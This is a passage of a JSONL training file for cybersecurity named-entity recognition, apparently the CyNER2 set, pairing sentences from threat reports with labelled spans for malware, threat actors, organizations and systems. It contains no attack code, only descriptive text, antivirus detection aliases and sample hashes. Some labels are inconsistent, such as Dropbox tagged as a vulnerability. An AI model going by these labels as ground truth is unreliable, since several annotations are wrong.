55]], "MALWARE: Exodus One": [[113, 123], [164, 174], [1085, 1095]], "MALWARE: Exodus Two": [[1278, 1288], [1419, 1429]]}, "info": {"id": "cyner2_train_002711", "source": "cyner2_train"}}
{"text": "LOWBALL abuses the Dropbox cloud storage service for command and control CnC.", "spans": {"MALWARE: LOWBALL": [[0, 7]], "VULNERABILITY: Dropbox cloud storage service": [[19, 48]]}, "info": {"id": "cyner2_train_002713", "source": "cyner2_train"}}
{"text": "The initial infection vector in this attack is not clear, but it results in installing the Downeks downloader, which in turn infects the victim computer with the Quasar RAT.", "spans": {"MALWARE: the Downeks downloader,": [[87, 110]], "SYSTEM: computer": [[144, 152]], "MALWARE: the Quasar RAT.": [[158, 173]]}, "info": {"id": "cyner2_train_002715", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dropper.NSIS Trojan.Zbot.Win32.160494 Win32.Trojan.WisdomEyes.16070401.9500.9957 TROJ_SPNR.15AE15 Trojan-Spy.Win32.Zbot.sbfu Trojan.Win32.Zbot.dtpiom TrojWare.Win32.CnzzBot.DAQ Trojan.Fakealert.47485 TROJ_SPNR.15AE15 Trojan[Spy]/Win32.Zbot.sbfu Trojan-Spy.Win32.Zbot.sbfu TrojanSpy.Zbot W32/CnzzBot.A!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002716", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.OnGameXEA.Trojan Trojan.Dropper.TJD Trojan.Dropper.TJD Trojan.Dropper.TJD Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Dropper.AYXX Trojan.Dropper.TJD Worm.Win32.AutoRun.gpog Trojan.Dropper.TJD Trojan.Dropper.TJD Trojan.Win32.Wimpixo Trojan:Win32/Wimpixo.B Trojan:Win32/Wimpixo.B Worm.Win32.AutoRun.gpog BScope.Trojan-Spy.Zbot", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002717", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-GameThief.Win32.OnLineGames!O Win32.Trojan.WisdomEyes.16070401.9500.9995 Win.Trojan.Mono-15 Trojan.Win32.OnLineGames.fcdid TrojWare.Win32.TrojanSpy.Pophot.d Trojan.PWS.Gamania.5803 BehavesLike.Win32.Ransom.lc Trojan/PSW.OnLineGames.kdn Win32.Hack.UpackT.a.15981 Trojan.Graftor.Elzob.D185D Troj.Heur.bmLerbcan7diu.moF3 Trj/Pupack.A Trojan.Win32.PSW Win32/Trojan.d9e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002718", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Elzob!O Trojan.Crastic.B Trojan.Heur.BmGfrb243Kiib W32.Imaut Trojan.Win32.Popuper.bfzygk Trojan.Popuper.42424 W32.Infostealer.Zeus HEUR/Fakon.mwf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002720", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/Trojan.NFEP-4133 Trojan.DownLoader9.29630 DDoS:MSIL/Webxahr.A DDoS.MSIL.Webxahr W32/DoSAttack.C!tr Win32/RootKit.Rootkit.7e5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002721", "source": "cyner2_train"}}
{"text": "Dridex has evolved, and now Dridex V4 uses Atom Bombing to perform process injection.", "spans": {"MALWARE: Dridex": [[0, 6]], "MALWARE: Dridex V4": [[28, 37]]}, "info": {"id": "cyner2_train_002723", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Exploit.Vb.R Exploit.Vb Exploit.VB.Win32.18 Trojan.Exploit.Vb.R Win32/Exploit.VB.R TROJ_VB.JUC Trojan.Exploit.Vb.R Exploit.Win32.VB.r Trojan.Exploit.Vb.R Exploit.W32.VB.r!c Trojan.Exploit.Vb.R Trojan.Exploit.Vb.R Trojan.Win32.Exploit Hacktool.SQL.54NB.a TR/Expl.VB.R Trojan[Exploit]/Win32.VB HackTool:Win32/Echoload.A Exploit.Win32.VB.r Trojan.Exploit.Vb.R Exploit.VB Win32.Exploit.Vb.Wsjr Exploit.VB!P1jmyBXhN28 W32/VB.R!exploit Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002724", "source": "cyner2_train"}}
{"text": "The Winter Vivern Advanced Persistent Threat APT is a pro-Russian cyber-espionage group that targets government and private businesses, including those involved in the ongoing war in Ukraine.", "spans": {"THREAT_ACTOR: The Winter Vivern Advanced Persistent Threat APT": [[0, 48]], "THREAT_ACTOR: a pro-Russian cyber-espionage group": [[52, 87]], "ORGANIZATION: government": [[101, 111]], "ORGANIZATION: private businesses,": [[116, 135]], "ORGANIZATION: war": [[176, 179]]}, "info": {"id": "cyner2_train_002727", "source": "cyner2_train"}}
{"text": "One of the command and control C2 servers that had been dormant for quite some time had suddenly woken up and started distributing what looks to be a new PoS malware family we're calling LockPoS.", "spans": {"MALWARE: new PoS malware family": [[150, 172]], "MALWARE: LockPoS.": [[187, 195]]}, "info": {"id": "cyner2_train_002728", "source": "cyner2_train"}}
{"text": "Geopolitical analysts have suggested that the United States may have its own interests that involve thwarting Chinese ambitions in the region.", "spans": {"ORGANIZATION: Geopolitical analysts": [[0, 21]], "ORGANIZATION: Chinese ambitions": [[110, 127]]}, "info": {"id": "cyner2_train_002731", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Kryptik.kqs Win32.Trojan.WisdomEyes.16070401.9500.9996 Tool.PassView.1838 Trojan.Kryptik.Win32.1246441 Worm.MSIL.Autorun Trojan.MSIL.Bladabindi.1 Trojan.MSIL.DOTHETUK Trj/CI.A Win32/Trojan.62b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002732", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.DarkKomet.Win32.23088 Trojan.Strictor.DF4F5 Win32.Trojan.WisdomEyes.16070401.9500.9970 Trojan.Win32.Zbot.deisvu Trojan.Hottrend.435 TR/Dropper.xzclg Trojan[Backdoor]/Win32.DarkKomet Trojan:Win32/Rombertik.C Backdoor.DarkKomet Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002733", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ocna Trojan.Win32.Ocna.k Trojan.OcnaCRTD.Win32.4895 TR/RemoteAdmin.tkpmq TrojanDropper:Win32/Jowbaki.A Trojan.Win32.Ocna.k Trojan.Ocna Trj/CI.A Win32/RA-based.AB Win32.Trojan.Ocna.Pgmm Win32/Trojan.388", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002734", "source": "cyner2_train"}}
{"text": "I started by trying to find the sample that the blog post analyzed and I was able to find it submitted to the great sandboxing site of Hybrid Analysis Big Shutout to @PayloadSecurity for the great service.", "spans": {"MALWARE: sample": [[32, 38]], "ORGANIZATION: Hybrid Analysis": [[135, 150]], "ORGANIZATION: @PayloadSecurity": [[166, 182]]}, "info": {"id": "cyner2_train_002736", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.ScriptKD.4274 Trojan.ScriptKD.4274 Trojan/Remtasu.f Win32.Trojan.WisdomEyes.16070401.9500.9859 W32/Trojan.QQOQ-8191 Trojan.ScriptKD.4274 Trojan.ScriptKD.4274 BehavesLike.Win32.Trojan.wc W64/Coinminer.N Trojan/Win32.Swisyn Trojan.ScriptKD.D10B2 Win32/CoinMiner.AFZ", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002737", "source": "cyner2_train"}}
{"text": "The malware encrypts files and the boot record of hard disks, leaving behind a ransomware note.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: ransomware": [[79, 89]]}, "info": {"id": "cyner2_train_002738", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.EquationDrug Troj.W32.Equationdrug!c Win32.Trojan.WisdomEyes.16070401.9500.9689 Trojan.Win32.EquationDrug.evztli Trojan.Win32.Z.Equationdrug.102912 Trojan.EquationDrug.85 W32/Trojan.DLSV-8631 W32.Trojan.Equdrug TR/Dropper.bkecf Trojan/Win32.EquationDrug Trojan.EquationDrug.4 Trj/GdSda.A Win32.Trojan.Equationdrug.Pgmi Trojan.EquationDrug! Trojan.Win32.Equdrug Win32/Trojan.6ba", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002740", "source": "cyner2_train"}}
{"text": "In February, the source code was reportedly leaked online, which likely spurred some of the recent changes we've observed in the kit.", "spans": {"MALWARE: kit.": [[129, 133]]}, "info": {"id": "cyner2_train_002741", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9872 Bloodhound.Malautoit TR/AD.DelfInject.twazy Trojan:Win32/Regub.A Zum.Locky.1 Zum.Locky.1 Zum.Locky.1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002742", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/Cossta.icp Trojan.Mikey.D12734 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Banker-13888 Virus.Win32.Lamer.kh Trojan.Win32.A.Cossta.65536.D Win32.Trojan.Cossta.bwce Trojan.DownLoader4.46980 BehavesLike.Win32.Downloader.ch Trojan/Cossta.bii Trojan/Win32.Cossta Win32.RabbitTail.b.2098552 Virus.Win32.Lamer.kh Trojan/Win32.Cossta.R23559 Trojan.Cossta Trojan.Win32.Cossta Win32/Trojan.ed9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002743", "source": "cyner2_train"}}
{"text": "This allowed NoMoreRansom to gain access to many of the decryption keys for the ransomware s victims.", "spans": {"ORGANIZATION: NoMoreRansom": [[13, 25]], "MALWARE: ransomware": [[80, 90]], "ORGANIZATION: victims.": [[93, 101]]}, "info": {"id": "cyner2_train_002744", "source": "cyner2_train"}}
{"text": "To date, Sowbug appears to be focused mainly on government entities in South America and Southeast Asia and has infiltrated organizations in Argentina, Brazil, Ecuador, Peru, Brunei and Malaysia.", "spans": {"MALWARE: Sowbug": [[9, 15]], "ORGANIZATION: government": [[48, 58]], "ORGANIZATION: organizations": [[124, 137]]}, "info": {"id": "cyner2_train_002745", "source": "cyner2_train"}}
{"text": "Recently, Palo Alto Networks researchers discovered an advanced Android malware we've named SpyDealer which exfiltrates private data from more than 40 apps and steals sensitive messages from communication apps by abusing the Android accessibility service feature.", "spans": {"ORGANIZATION: Palo Alto Networks researchers": [[10, 40]], "MALWARE: advanced Android malware": [[55, 79]], "MALWARE: SpyDealer": [[92, 101]], "SYSTEM: apps": [[151, 155], [205, 209]], "VULNERABILITY: abusing the Android accessibility service feature.": [[213, 263]]}, "info": {"id": "cyner2_train_002746", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hoax.Win32.ArchSMS!O Trojan.ArchSMS.Win32.178 Win32/FakeInstall.BH Win.Trojan.Archsms-882 HEUR:Hoax.Win32.ArchSMS.HEUR Riskware.Win32.ArchSMS.dqovc ApplicUnwnt.Win32.Hoax.ArchSMS.E Tool.SMSSend.117 Trojan-Banker.Win32.Banbra TR/Zen.C HackTool[Hoax]/Win32.ArchSMS Win32.Troj.Hoax.kcloud Trojan:Win32/Moxtrarch.A HEUR:Hoax.Win32.ArchSMS.HEUR Adware.VPets.121105 Hoax.ArchSMS!DSd5P3jaerI W32/ArchSMS.EF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002747", "source": "cyner2_train"}}
{"text": "The Rilide stealer is a prime example of the increasing sophistication of malicious browser extensions and the dangers they pose.", "spans": {"MALWARE: The Rilide stealer": [[0, 18]], "MALWARE: malicious browser extensions": [[74, 102]]}, "info": {"id": "cyner2_train_002748", "source": "cyner2_train"}}
{"text": "The oldest sample we've seen up to now is from November 2013.", "spans": {}, "info": {"id": "cyner2_train_002749", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hacktool.Koobface Win32/Koobface.AKJ Trojan.Win32.Facebfr.cvvcfx Tool.Facebfr BehavesLike.Win32.Swisyn.kh SPR/HackFacebo.A Trojan.Kazy.DA8A0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002750", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Winupnemsys.Trojan Worm.Win32.Mefir!O Win32.Trojan.WisdomEyes.16070401.9500.9998 W32.SillyFDC Win32/Mefir.A Win.Worm.Autorun-316 Worm.Win32.Mefir.a Trojan.Win32.MLW.uvszt Worm.Win32.A.Mefir.143360 Win32.Virus.Mefir.Ectu Worm.Win32.Mefir.B Win32.HLLW.Autoruner.216 Worm.Mefir.Win32.3 Worm/Mefir.f Worm:Win32/Mefir.A Worm:Win32/Mefir.A Worm.Win32.Mefir.a W32/Mefir.A.worm Worm.Mefir!BwUbuvfvViU Worm.Win32.Mefir.a Win32/Trojan.d06", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002751", "source": "cyner2_train"}}
{"text": "In the recent weeks, various anti-virus vendors and security researchers published blog posts on this threat, presenting their analysis and findings.", "spans": {"ORGANIZATION: anti-virus vendors": [[29, 47]], "ORGANIZATION: security researchers": [[52, 72]], "MALWARE: threat,": [[102, 109]]}, "info": {"id": "cyner2_train_002752", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Trojan BKDR_MANGZAMEL.B Trojan.Mangzamel.Win32.11 BKDR_MANGZAMEL.B BDS/Vedratve.zgxnw Backdoor:Win32/Vedratve.A!dha Trj/CI.A Win32/Backdoor.f40", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002753", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Symmi.D13C10 Win32.Trojan.WisdomEyes.16070401.9500.9915 Trojan.Win32.Ekstak.ddqe Trojan.Win32.Ekstak.exahds Trojan.InstallCube.2631 PUA.ICLoader Pua.Downloadmgr Trojan:Win32/Spiltderp.A Trojan.Win32.Ekstak.ddqe Trojan/Win32.Ekstak.R217792 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002755", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exp.OLE.CVE-2009-3129.A Exploit.MSExcel.CVE-2009-3129.ccxskf Exploit.Excel.CVE-2009-3129 Downloader.OLE.HiddenEXE MSExcel/CVE_2009_3129.A!exploit Win32/Trojan.Exploit.19f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002760", "source": "cyner2_train"}}
{"text": "A second version 2.1-LNK with the network tag StrangeLove was discovered shortly after.", "spans": {"MALWARE: 2.1-LNK": [[17, 24]], "MALWARE: StrangeLove": [[46, 57]]}, "info": {"id": "cyner2_train_002761", "source": "cyner2_train"}}
{"text": "Appendix Samples Some of the latest Ginp samples found in the wild : App name Package name SHA-256 hash Google Play Verificator sing.guide.false 0ee075219a2dfde018f17561467272633821d19420c08cba14322cc3b93bb5d5 Google Play Verificator park.rather.dance 087a3beea46f3d45649b7506073ef51c784036629ca78601a4593759b253d1b7 Adobe Flash Player ethics.unknown.during 5ac6901b232c629bc246227b783867a0122f62f9e087ceb86d83d991e92dba2f Adobe Flash Player solution.rail.forward 7eb239cc86e80e6e1866e2b3a132b5af94a13d0d24f92068a6d2e66cfe5c2cea Adobe Flash Player com.pubhny.hekzhgjty 14a1b1dce69b742f7e258805594f07e0c5148b6963c12a8429d6e15ace3a503c Adobe Flash Player sentence.fancy.humble 78557094dbabecdc17fb0edb4e3a94bae184e97b1b92801e4f8eb0f0626d6212 Target list The current list of apps observed to be targeted by Ginp contains a total of 24 unique applications as seen below .", "spans": {"MALWARE: Ginp": [[36, 40], [804, 808]], "SYSTEM: Google Play Verificator": [[104, 127], [210, 233]], "SYSTEM: park.rather.dance": [[234, 251]], "SYSTEM: Adobe Flash Player": [[317, 335], [423, 441], [529, 547], [634, 652]]}, "info": {"id": "cyner2_train_002762", "source": "cyner2_train"}}
{"text": "We typically see techniques at this level by well-resourced, well-funded, motivated adversaries.", "spans": {}, "info": {"id": "cyner2_train_002763", "source": "cyner2_train"}}
{"text": "Additionally, in all cases, the theft took place using normal cash withdrawals from various ATM terminal locations outside the bank's originating country.", "spans": {}, "info": {"id": "cyner2_train_002764", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Exploit-MSExcel.p Trojan.Mdropper.AA TROJ_MDROP.AH Exploit.MSExcel.CVE-2008-0081.ccxsez Exploit.Excel.1 TROJ_MDROP.AH Exploit-MSExcel.p EXP/Excel.CVE-2008-0081 MSExcel/UDDesc.A!exploit.M20080081 Win32/Trojan.Exploit.903", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002768", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heuristic.LooksLike.Trojan.Dropper.I TrojanDropper:Win32/Datunif.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002770", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Emotet TSPY_EMOTET.SMZD172 Win32.Trojan.WisdomEyes.16070401.9500.9999 TSPY_EMOTET.SMZD172 Trojan.Packed2.40646 Trojan.Dovs.Win32.2068 BehavesLike.Win32.Backdoor.ch W32.Trojan.Emotet Trojan:Win32/Emotet.R!bit Trojan.Razy.D36CE4 Trojan/Win32.Emotet.R215266 Trojan.Win32.Emotet", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002771", "source": "cyner2_train"}}
{"text": "Additional targets have included journalists, political advisors, and organizations associated with political activism in central Asia.", "spans": {"ORGANIZATION: journalists, political advisors,": [[33, 65]], "ORGANIZATION: organizations": [[70, 83]], "ORGANIZATION: political activism": [[100, 118]]}, "info": {"id": "cyner2_train_002772", "source": "cyner2_train"}}
{"text": "However, initial static analysis revealed that all of these samples appear to be identical on the surface, leading us to believe that we had discovered a new loader.", "spans": {}, "info": {"id": "cyner2_train_002773", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Rimecud.1!O Trojan.Rimecud.U TROJ_RIMECUD.SMX Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_RIMECUD.SMX Trojan.Win32.Fsysna.eqph TrojWare.Win32.Kryptik.AMMN BehavesLike.Win32.PWSZbot.ch Virus.Win32.Cryptor Ransom:Win32/Grymegat.A Trojan.Kazy.D16E7F Trojan.Win32.Fsysna.eqph Trojan/Win32.Jorik.R40701 Trj/Rimecud.f W32/Rimecud.GRC!tr Win32/Trojan.801", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002777", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Exploit/W32.Nuker.203264 Exploit.Nuker Tool.Vai.Win32.1 Exploit.W32.Nuker!c W32/Trojan2.EKA Win.Tool.W32-65 Exploit.Win32.Nuker.Vai.c Exploit.Win32.Nuker-Vai.htmm TrojWare.Win32.Nuker.Vai.C FDOS.VTG.201 W32/Trojan.LISQ-8951 Nuke/Win32.Vai.c Trojan:Win32/VAI.C SPR/DDoS.ICMP.Vait10 Trojan[Exploit]/Win32.Nuker Trojan:Win32/VAI.C Exploit.Win32.Nuker.Vai.c Nuker.Vai Win32/Nuker.Vai.C Win32.Exploit.Nuker.Efbk W32/Nuker_Vai.C!tr Win32/Trojan.Exploit.237", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002778", "source": "cyner2_train"}}
{"text": "These malicious Office documents are being spread as an attachment using spear phishing emails as described here.", "spans": {}, "info": {"id": "cyner2_train_002780", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.AutoIt.Pistolar.A Worm.AutoIt.Win32.16752 Trojan.Heur.rmLfrvwRR2pib TROJ_SPNR.03BL13 Win32.Trojan.AutoIt.a TROJ_SPNR.03BL13 Trojan.KillFiles.61768 BehavesLike.Win32.VirRansom.dc Troj.W32.Autoit.lWNh HEUR/Fakon.mwf Win32/Autoit.MB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002781", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Infostealer.Limitail Trojan.Win32.Sourtoff.dshygu Trojan.Yakes.Win32.34007 BehavesLike.Win32.Backdoor.fc Trojan/Injector.cbpj Trojan.Win32.Boaxxe TrojanDropper.Injector.awup TR/Crypt.Xpack.8996 Trojan/Win32.Sourtoff Trojan.Zboter.5 Trojan/Win32.Ransomcrypt.R151582 Trojan.Yakes Trojan.Yakes!LiL7XolSsr0 Win32/Trojan.34b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002782", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.AutoIt Worm.AutoIt.Win32.13406 Win32.Trojan.WisdomEyes.16070401.9500.9999 Worm.Win32.AutoIt.qaw Trojan.Win32.AutoIt.ewujea W32.W.WBNA.lJwt Trojan.MulDrop5.8834 BehavesLike.Win32.Trojan.cz Worm.Win32.AutoRun W32/Trojan.WOLP-1815 Worm/Win32.AutoIt Worm:Win32/Selfita.A Worm.Win32.AutoIt.qaw Worm.AutoIt Win32/AutoRun.VB.BEZ Win32.Worm.Autoit.Pgmr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002784", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clodd7a.Trojan.d028 Trojan-Downloader/W32.Lemmy.65536.B Downloader.Lemmy.Win32.31 Troj.Downloader.W32.Lemmy.u!c Trojan/Downloader.Lemmy.q W32/Lemmy.AO Adware.Roimoi Win32/TrojanDownloader.Lemmy.AA TROJ_LEMMY.L Win.Downloader.71376-1 Trojan-Downloader.Win32.Lemmy.u Trojan.Win32.Lemmy.gugs Trojan.Win32.Downloader.65536.IK[h] TrojWare.Win32.TrojanDownloader.Lemmy.u0 Adware.MediaMotor.130 TROJ_LEMMY.L BehavesLike.Win32.Trojan.kt W32/Lemmy.RFEY-5815 TrojanDownloader.Lemmy.f TR/Dldr.Lemmy.Q.2 W32/Dloader.X!tr Trojan[Downloader]/Win32.Lemmy Win32.Troj.Lemmy.o.kcloud Trojan/Win32.HDC.C89215 TrojanDownloader:Win32/Lemmy.U TScope.Trojan.VB Win32.Trojan-downloader.Lemmy.Egoh Trojan.DL.Lemmy!fetCOQguJic Trojan-Downloader.Win32.Lemmy.q", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002785", "source": "cyner2_train"}}
{"text": "A backdoor also known as: WS.Reputation.1 PWS:Win32/Yaludle.D Trojan-PWS.Win32.Yaludle", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002786", "source": "cyner2_train"}}
{"text": "Today, we noticed CVE-2015-5119 the identifier for this vulnerability being used in a rather unusual attack pattern.", "spans": {}, "info": {"id": "cyner2_train_002789", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Ransom_Necne.R002C0DAU18 Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom_Necne.R002C0DAU18 Trojan.Win32.Filecoder.eximhz Trojan.Win32.Z.Kelios.56320 Trojan.Encoder.24408 Trojan.Filecoder.Win32.7015 BehavesLike.Win32.Backdoor.qh Trojan-Ransom.FileCoder W32/Trojan.TPMK-1866 TR/AD.Petya.muyif Ransom.Filecoder/Variant Trojan.Encoder Ransom.FileCryptor Trj/GdSda.A W32/Filecoder.FV!tr Win32/Trojan.4af", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002790", "source": "cyner2_train"}}
{"text": "In the attached paper we will focus on two exploits which at the time of discovery in the Hacking Team archives were unpatched.", "spans": {"MALWARE: exploits": [[43, 51]], "ORGANIZATION: Hacking Team": [[90, 102]], "VULNERABILITY: unpatched.": [[117, 127]]}, "info": {"id": "cyner2_train_002792", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mikey.DDFDA Ransom_PETYA.SM2 Win32.Trojan.WisdomEyes.16070401.9500.9986 Ransom_PETYA.SM2 Trojan.Win32.AD.epiohw BehavesLike.Win32.Ransom.cc Ransom.Petya Win32/Diskcoder.Petya.E Trojan.Diskcoder! Trojan-Ransom.GoldenEye W32/Petya.E!tr.ransom", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002794", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan-Downloader.MSIL.Small.vii Trojan.Win32.Clicker.dckckw Trojan[Downloader]/MSIL.Small Win32.TrojDownloader.MSIL.kcloud Trojan.Kazy.D17F7F Trojan-Downloader.MSIL.Small.vii Trojan:MSIL/Keywsec.B Trojan.Clicker Trojan.Keywsec!MUZFw6FSjt8 Win32/Trojan.419", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002795", "source": "cyner2_train"}}
{"text": "During the last weeks there have been several cases of international brand names being used by malware authors to propagate malware through phishing emails.", "spans": {"ORGANIZATION: international brand": [[55, 74]], "THREAT_ACTOR: malware authors": [[95, 110]], "MALWARE: malware": [[124, 131]]}, "info": {"id": "cyner2_train_002797", "source": "cyner2_train"}}
{"text": "A backdoor targetting Linux also known as: Exploit.Linux.Vmsplice.A Exploit.Lotoor.Linux.131 HEUR:Exploit.Linux.Lotoor.bh Exploit.Unix.Lotoor.exdfpk Exploit.Linux.Lotoor!c Linux.Exploit.Local.147 Exploit.Linux.auf LINUX/Lotoor.qcvrg Trojan[Exploit]/Linux.Lotoor.bh HEUR:Exploit.Linux.Lotoor.bh Linux.Exploit.Lotoor.Htmf Trojan.Linux.Exploit Linux/Vmsplice.K!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002798", "source": "cyner2_train"}}
{"text": "The attackers used different command and control servers C2s for each malware family, a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "MALWARE: each malware family,": [[65, 85]], "SYSTEM: infrastructure": [[169, 183]]}, "info": {"id": "cyner2_train_002799", "source": "cyner2_train"}}
{"text": "This new version comes as an email attachment which is a zip inside a zip before extracting to a .js file in a fake Delivery Status Notification, failed to deliver email bounce message.", "spans": {}, "info": {"id": "cyner2_train_002800", "source": "cyner2_train"}}
{"text": "Attacks using BigBoss appear likely to have occurred since mid-2015, whereas SillyGoose appears to have been distributed since September 2016.", "spans": {"MALWARE: BigBoss": [[14, 21]], "MALWARE: SillyGoose": [[77, 87]]}, "info": {"id": "cyner2_train_002801", "source": "cyner2_train"}}
{"text": "The first method, dubbed proxy-changing is commonly used for HTTP packets inspections.", "spans": {}, "info": {"id": "cyner2_train_002802", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.LovGate.W@mm W32.LovGate.W Win32.LovGate.W@mm Spyware.PasswordStealer W32/Lovgate.W@M Win32.LovGate.E8C19A WORM_LOVGATE.BJ Win32.Trojan.WisdomEyes.16070401.9500.9982 W32/Lovgate.W@mm W32.HLLW.Lovgate.I@mm Win32/Lovgate.AX WORM_LOVGATE.BJ Win.Worm.Lovgate-35 Win32.LovGate.W@mm Trojan.Win32.MultiPacked.dgpeeo Win32.Worm-email.Lovgate.Dwsv Win32.HLLM.Lovgate.based Worm.LovGate.Win32.79 BehavesLike.Win32.PWSZbot.cc W32/Lovgate.W@mm I-Worm/Supkp.a WORM/Lovgate.BK Worm[Email]/Win32.LovGate Worm:Win32/Lovgate.W@mm W32.W.LovGate.kYPD Win32.LovGate.W@mm Win32/LovGate.worm.179200 W32/Lovgate.w@M Worm.Lovgate I-Worm.Lovgate.AP Win32/Lovgate.AP I-Worm.Lovgate.BI Worm.Win32.Lovgate Win32.LovGate.W@mm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002803", "source": "cyner2_train"}}
{"text": "The Trojan may download and execute the following potentially malicious file: %Temp%\\[RANDOM CHARACTERS].dll", "spans": {"MALWARE: Trojan": [[4, 10]]}, "info": {"id": "cyner2_train_002808", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9711 Spyware.Keylogger BehavesLike.Win32.Fake.lc Trojan-Proxy.Win32.Glukelira Trojan/Win32.Glukelira.R10186", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002814", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAdware.909D Downloader.AdloadCRT.Win32.596 Win.Trojan.Downloader-65968 not-a-virus:Downloader.Win32.AdLoad.rbbv Trojan.Win32.AdLoad.dvwwyc Adware.Downloadadmin.85624 Trojan.Vittalia.12437 not-a-virus:Downloader.DownloAdmin Pua.Downloadmanager RiskWare[Downloader]/Win32.AdLoad.rbbv Trojan.Application.Bundler.DownloadAdmin.3 PUP.DownloadAdmin/Variant not-a-virus:Downloader.Win32.AdLoad.rbbv PUP/Win32.DownloadAdmin.R162593 Downloader.DownloAdmin Trj/Downloader.WOL Win32/Application.d3c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002816", "source": "cyner2_train"}}
